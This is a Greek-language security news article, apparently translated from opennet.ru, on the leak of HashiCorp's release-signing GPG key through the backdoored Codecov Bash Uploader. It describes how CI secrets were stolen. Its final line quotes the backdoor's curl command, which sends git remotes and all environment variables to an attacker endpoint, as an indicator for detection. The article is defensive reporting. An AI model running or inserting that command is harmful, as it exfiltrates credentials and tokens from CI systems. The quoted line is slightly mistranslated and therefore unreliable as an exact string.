Η HashiCorp, γνωστή για την ανάπτυξη των εργαλείων ανοιχτού κώδικα Vagrant, Packer, Nomad και Terraform, ανακοίνωσε τη διαρροή του ιδιωτικού κλειδιού GPG που χρησιμοποιείται για τη δημιουργία ψηφιακών υπογραφών που επαληθεύουν τις εκδόσεις. Οι εισβολείς που απέκτησαν πρόσβαση στο κλειδί GPG θα μπορούσαν ενδεχομένως να κάνουν κρυφές αλλαγές στα προϊόντα HashiCorp επαληθεύοντάς τα με μια σωστή ψηφιακή υπογραφή. Παράλληλα, η εταιρεία δήλωσε ότι κατά τον έλεγχο δεν εντοπίστηκαν ίχνη απόπειρας τέτοιων τροποποιήσεων.
Επί του παρόντος, το παραβιασμένο κλειδί GPG έχει ανακληθεί και στη θέση του έχει εισαχθεί ένα νέο κλειδί. Το πρόβλημα επηρέασε μόνο την επαλήθευση χρησιμοποιώντας τα αρχεία SHA256SUM και SHA256SUM.sig και δεν επηρέασε τη δημιουργία ψηφιακών υπογραφών για πακέτα Linux DEB και RPM που παρέχονται μέσω του releases.hashicorp.com, καθώς και τους μηχανισμούς επαλήθευσης έκδοσης για macOS και Windows (AuthentiCode) .
Η διαρροή προέκυψε λόγω της χρήσης του σεναρίου Codecov Bash Uploader (codecov-bash) στην υποδομή, που έχει σχεδιαστεί για τη λήψη αναφορών κάλυψης από συστήματα συνεχούς ενοποίησης. Κατά τη διάρκεια της επίθεσης στην εταιρεία Codecov, μια κερκόπορτα κρύφτηκε στο καθορισμένο σενάριο, μέσω της οποίας στάλθηκαν κωδικοί πρόσβασης και κλειδιά κρυπτογράφησης στον διακομιστή των εισβολέων.
Για να χακάρουν, οι εισβολείς εκμεταλλεύτηκαν ένα σφάλμα στη διαδικασία δημιουργίας της εικόνας του Codecov Docker, το οποίο τους επέτρεψε να εξαγάγουν δεδομένα πρόσβασης στο GCS (Google Cloud Storage), που ήταν απαραίτητο για να κάνουν αλλαγές στο σενάριο του Bash Uploader που διανέμεται από το codecov.io δικτυακός τόπος. Οι αλλαγές έγιναν στις 31 Ιανουαρίου, παρέμειναν απαρατήρητες για δύο μήνες και επέτρεψαν στους εισβολείς να εξάγουν πληροφορίες που ήταν αποθηκευμένες σε περιβάλλοντα συστημάτων συνεχούς ενοποίησης πελατών. Χρησιμοποιώντας τον προστιθέμενο κακόβουλο κώδικα, οι εισβολείς μπορούσαν να λάβουν πληροφορίες σχετικά με το δοκιμασμένο αποθετήριο Git και όλες τις μεταβλητές περιβάλλοντος, συμπεριλαμβανομένων των διακριτικών, των κλειδιών κρυπτογράφησης και των κωδικών πρόσβασης που μεταδίδονται σε συστήματα συνεχούς ενοποίησης για να οργανώσουν την πρόσβαση σε κώδικα εφαρμογής, αποθετήρια και υπηρεσίες όπως το Amazon Web Services και το GitHub.
Εκτός από την άμεση κλήση, το σενάριο Codecov Bash Uploader χρησιμοποιήθηκε ως μέρος άλλων προγραμμάτων μεταφόρτωσης, όπως Codecov-action (Github), Codecov-circleci-orb και Codecov-bitrise-step, των οποίων οι χρήστες επηρεάζονται επίσης από το πρόβλημα. Συνιστάται σε όλους τους χρήστες του codecov-bash και των σχετικών προϊόντων να ελέγχουν τις υποδομές τους, καθώς και να αλλάζουν κωδικούς πρόσβασης και κλειδιά κρυπτογράφησης. Μπορείτε να ελέγξετε την παρουσία μιας κερκόπορτας σε ένα σενάριο με την παρουσία της γραμμής curl -sm 0.5 -d "$(git remote -v)<<<<<<< ENV $(env)" http:// /upload/v2 || αληθής
Πηγή: opennet.ru